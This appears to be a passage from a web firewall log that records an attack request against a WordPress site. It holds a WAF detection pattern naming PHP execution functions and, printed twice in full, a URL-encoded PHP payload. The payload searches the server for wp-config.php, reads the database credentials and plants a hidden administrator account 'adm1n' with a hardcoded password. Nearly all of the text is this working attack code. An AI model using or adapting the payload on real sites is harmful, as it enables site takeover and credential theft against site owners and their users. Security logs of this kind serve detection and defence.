20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));"]
["2026-05-16 18:11:59","213.209.159.254","POST","\/wp-includes\/feed.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/116.0.0.0 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> xW:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/wp-includes\/feed.php HTTP\/1.1\ncontent-length:12640\nsec-ch-ua:\"Chromium\";v=\"116\", \"Not)A;Brand\";v=\"24\", \"Google Chrome\";v=\"116\"\ncookie:4=ea1451643f613b39572752b883798a94; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvrSpvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzyhL2k1MTHvB2yzXTMcoTIspUI0K2AioaEyoaEmXPEjYPEwXFy7nJ5woUIxMFNxpQgNqJ5fnJ5eXPEjXGgyrTy0B319sJEcMFtvVJ5iqUqlqTWfVFVcBj==; 1=53; 0=71\nsec-ch-ua-mobile:?0\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/116.0.0.0 Safari\/537.36\nsec-ch-ua-platform:\"Windows\"\ncontent-type:application\/x-www-form-urlencoded\nsec-fetch-site:none\nsec-fetch-mode:navigate\nsec-fetch-user:?1\nsec-fetch-dest:document\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\n\nxW=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
